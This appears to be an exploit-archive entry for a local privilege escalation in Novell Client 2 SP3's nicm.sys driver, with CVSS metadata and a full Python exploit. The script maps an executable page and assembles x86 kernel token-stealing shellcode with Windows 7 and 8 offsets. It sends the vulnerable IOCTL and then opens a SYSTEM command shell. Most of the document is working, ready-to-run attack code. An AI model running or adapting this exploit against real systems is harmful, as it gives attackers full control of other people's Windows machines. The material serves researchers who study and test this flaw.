Novell Client 2 SP3 Privilege escalation exploit

2013-07-29 / 2013-10-21
Credit: Master Ryujin
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

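r"""Novell Client 2 SP3 local privilege escalation (nicm.sys 3.1.11.0).

Tested by the original author on Windows 7 and Windows 8 (x86).
Thanks to Master Ryujin :)
The first public information about this bug that the original author had seen
came from Nikita Tarakanov (@NTarakanov); it is not known whether anything
else was public before that.
Metasploit module working against Windows 7:
http://www.exploit-db.com/exploits/26452/

What the script does (only what is visible in this file):
  * maps one RWX page at a fixed user-mode address and fills it with a short
    pointer chain followed by x86 token-stealing shellcode;
  * sends IOCTL 0x00143B6B to \\.\nicm with that page as the input buffer;
    the driver ends up executing the shellcode in kernel mode (how nicm.sys
    walks the pointer chain is not visible here and is inferred from the
    payload layout only);
  * the shellcode walks EPROCESS.ActiveProcessLinks until it finds PID 4
    (System) and copies System's token pointer over the calling process's
    token;
  * spawns cmd.exe, which now runs as SYSTEM.

Requirements / caveats:
  * x86 Windows only; run it from a 32-bit Python - the shellcode, the
    structure offsets and the handle/size types assume 32-bit pointers.
    Works under Python 2 and 3 (all payload data is built as bytes).
  * the KTHREAD/EPROCESS offsets are build specific; a wrong offset produces
    a kernel-mode crash (BSOD), not a clean failure.
  * the token pointer is copied without touching its reference count (the
    usual shortcut of token-stealing payloads), so the system may become
    unstable when the elevated process is torn down - keep the shell open.
  * use only on systems you are authorized to test.
"""
from ctypes import *
import sys, struct, os
from optparse import OptionParser

# --- Win32 / NT constants -------------------------------------------------
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
# CreateFileA signals failure with INVALID_HANDLE_VALUE (-1), *not* NULL; the
# original's "if handle:" test could therefore never catch a failed open.
# -1 is what ctypes' default c_int restype hands back for it.
INVALID_HANDLE_VALUE = -1
CURRENT_PROCESS = -1            # NtCurrentProcess() / GetCurrentProcess() pseudo-handle
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
STATUS_SUCCESS = 0
SYSTEM_PID = 4                  # PID of the System process, whose token is stolen

# --- Target specifics ----------------------------------------------------
DEVICE = b"\\\\.\\nicm"
EVIL_IOCTL = 0x00143B6B         # vulnerable IOCTL
PAYLOAD_BASE = 0x0d0d0000       # user-mode address the payload page is mapped at
PAYLOAD_PAGE = 0x1000
IOCTL_INPUT_SIZE = 0x14         # input-buffer length handed to DeviceIoControl
SHELLCODE_OFFSET = 0x28         # where the shellcode sits inside the payload page

# Structure offsets used by the shellcode, per target (x86 builds), taken from
# the original exploit.  The names suggest KTHREAD.ApcState.Process,
# EPROCESS.Token, EPROCESS.UniqueProcessId and EPROCESS.ActiveProcessLinks;
# verify against the symbols of the build you are targeting before use.
OFFSETS = {
    "WIN7": {"kprocess": 0x50, "token": 0xF8, "upid": 0xB4, "aplinks": 0xB8},
    "WIN8": {"kprocess": 0x80, "token": 0xEC, "upid": 0xB4, "aplinks": 0xB8},
}


def _mov_eax_from_eax(disp):
    """Encode ``mov eax, [eax+disp]`` with the shortest displacement.

    A displacement below 0x80 fits the signed disp8 form (``8b 40 xx``),
    anything larger needs disp32 (``8b 80 xx xx xx xx``).  This reproduces
    the two encodings the original used for Win7 (0x50) and Win8 (0x80).
    """
    if disp < 0x80:
        return b"\x8b\x40" + struct.pack("<B", disp)
    return b"\x8b\x80" + struct.pack("<I", disp)


def build_token_stealing_shellcode(target):
    """Return the x86 kernel-mode token-stealing shellcode for *target*.

    Args:
        target: "WIN7" or "WIN8" (case-insensitive).

    Returns:
        bytes: position-independent code that ends with ``ret 8``.

    Raises:
        ValueError: for a target without an offset table.

    The code saves edx/ebx, finds the current EPROCESS via
    fs:[0x124] (current KTHREAD) -> KTHREAD+kprocess, walks
    ActiveProcessLinks until UniqueProcessId == 4, copies that process's
    Token pointer into the current EPROCESS and returns.  No reference count
    is taken on the copied token.
    """
    key = str(target).upper()
    try:
        off = OFFSETS[key]
    except KeyError:
        raise ValueError("unsupported target %r (expected one of: %s)"
                         % (target, ", ".join(sorted(OFFSETS))))

    token = struct.pack("<I", off["token"])
    aplinks = struct.pack("<I", off["aplinks"])
    upid = struct.pack("<I", off["upid"])

    prologue = [
        b"\x52",                          # push edx
        b"\x53",                          # push ebx
        b"\x33\xc0",                      # xor eax, eax
        b"\x64\x8b\x80\x24\x01\x00\x00",  # mov eax, fs:[eax+0x124]  ; current KTHREAD
        _mov_eax_from_eax(off["kprocess"]),  # mov eax, [eax+kprocess] ; current EPROCESS
        b"\x8b\xc8",                      # mov ecx, eax             ; ecx = our EPROCESS
        b"\x8b\x98" + token,              # mov ebx, [eax+token]     ; ebx = our token
    ]
    if key == "WIN7":
        # mov [0x00020900], ebx -- present only in the Win7 variant of the
        # original.  It stores the current token pointer at a fixed user-mode
        # address; its purpose is not documented (looks like a debugging
        # leftover).  Kept so the Win7 byte sequence stays the one that was
        # tested.  TODO(review): confirm whether it is actually needed.
        prologue.append(b"\x89\x1d\x00\x09\x02\x00")

    # Loop: follow ActiveProcessLinks.Flink to the next EPROCESS until its
    # UniqueProcessId is SYSTEM_PID.  The jnz displacement is computed from
    # the loop body so the offsets above cannot desynchronise it.
    walk = (
        b"\x8b\x80" + aplinks                               # mov eax, [eax+aplinks] ; Flink
        + b"\x81\xe8" + aplinks                             # sub eax, aplinks       ; -> EPROCESS
        + b"\x81\xb8" + upid + struct.pack("<I", SYSTEM_PID)  # cmp dword [eax+upid], 4
    )
    walk += b"\x75" + struct.pack("<b", -(len(walk) + 2))  # jnz <top of loop>

    epilogue = (
        b"\x8b\x90" + token   # mov edx, [eax+token]   ; System's token pointer
        + b"\x8b\xc1"         # mov eax, ecx           ; back to our EPROCESS
        + b"\x89\x90" + token # mov [eax+token], edx   ; overwrite our token
        + b"\x5b"             # pop ebx
        + b"\x5a"             # pop edx
        # ret 8.  The original emitted only "c2 08" (a truncated ret imm16)
        # and relied on the byte following its buffer being 0x00 when it
        # over-read it with WriteProcessMemory; the full 3-byte encoding
        # removes that dependency.
        + b"\xc2\x08\x00"
    )
    return b"".join(prologue) + walk + epilogue


def build_ioctl_payload(shellcode, base=PAYLOAD_BASE):
    """Return the page contents handed to the driver at address *base*.

    Layout (all pointers are absolute, little-endian, relative to *base*):
        +0x00  dword -> base+0x14     (start of the IOCTL input buffer)
        +0x04  16 filler bytes ("A")
        +0x14  dword -> base+0x18
        +0x18  12 filler bytes ("A")
        +0x24  dword -> base+0x28     (the shellcode)
        +0x28  shellcode

    Only the first IOCTL_INPUT_SIZE (0x14) bytes are declared as the input
    buffer; the rest is reached through the pointers.  The filler value does
    not appear to matter.  With the default *base* this is byte-for-byte the
    layout of the original exploit.
    """
    ptr = lambda addr: struct.pack("<I", addr)
    header = b"".join([
        ptr(base + 0x14),
        b"A" * 16,
        ptr(base + 0x18),
        b"A" * 12,
        ptr(base + SHELLCODE_OFFSET),
    ])
    assert len(header) == SHELLCODE_OFFSET, "payload header size drifted"
    return header + shellcode


def main(argv=None):
    """Parse ``-o <WIN7|WIN8>``, fire the exploit and drop to a shell.

    Every Win32/NT call is checked: a failure before the IOCTL is reported
    and the script exits instead of sending a half-built page to the kernel
    (which would crash the machine rather than fail cleanly).  The IOCTL's
    own return value is only reported, since the original proceeded to the
    shell regardless.
    """
    parser = OptionParser(usage="%prog -o <target>")
    parser.add_option("-o", type="string", action="store", dest="target_os",
                      help="Available target operating systems: WIN7, WIN8")
    options, _args = parser.parse_args(argv)
    target = (options.target_os or "").upper()
    if target not in OFFSETS:
        parser.print_help()
        sys.exit()

    # Resolved here rather than at import time so the payload builders can be
    # imported (and unit-tested) on non-Windows hosts.
    kernel32 = windll.kernel32
    ntdll = windll.ntdll

    print("[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8.")
    print("[>] Finding the driver.")
    device = kernel32.CreateFileA(DEVICE, GENERIC_READ | GENERIC_WRITE, 0, None,
                                  OPEN_EXISTING, 0, None)
    if device == INVALID_HANDLE_VALUE:
        print("[-] Could not open %s: %s (is Novell Client installed?)"
              % (DEVICE.decode("ascii"), WinError()))
        sys.exit(1)

    print("[>] Allocating memory for our shellcode.")
    base = c_ulong(PAYLOAD_BASE)
    region = c_ulong(PAYLOAD_PAGE)
    status = ntdll.NtAllocateVirtualMemory(CURRENT_PROCESS, byref(base), 0, byref(region),
                                           MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if status != STATUS_SUCCESS:
        print("[-] NtAllocateVirtualMemory(0x%08x) failed: NTSTATUS 0x%08x"
              % (PAYLOAD_BASE, status & 0xFFFFFFFF))
        sys.exit(1)

    # Build the page against the address we actually got, so the embedded
    # pointers stay valid even if the kernel adjusted the base.
    payload = build_ioctl_payload(build_token_stealing_shellcode(target), base.value)

    print("[>] Writing the shellcode.")
    written = c_ulong(0)
    # Write exactly len(payload) bytes; the original asked for 0x1000 and so
    # read past the end of its (much shorter) Python string.
    ok = kernel32.WriteProcessMemory(CURRENT_PROCESS, base.value, payload, len(payload),
                                     byref(written))
    if not ok or written.value != len(payload):
        print("[-] WriteProcessMemory failed: %s" % WinError())
        sys.exit(1)

    print("[>] Sending IOCTL to the driver.")
    returned = c_ulong(0)
    ok = kernel32.DeviceIoControl(device, EVIL_IOCTL, base.value, IOCTL_INPUT_SIZE,
                                  None, 0, byref(returned), None)
    if not ok:
        # Reported only: the original went on to the shell regardless, and
        # the token swap may already have happened by the time the driver
        # reports an error.
        print("[!] DeviceIoControl returned failure: %s" % WinError())

    print("[>] Dropping to a SYSTEM shell.")
    os.system("cmd.exe /K cd C:\\windows\\system32")


if __name__ == "__main__":
    main()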

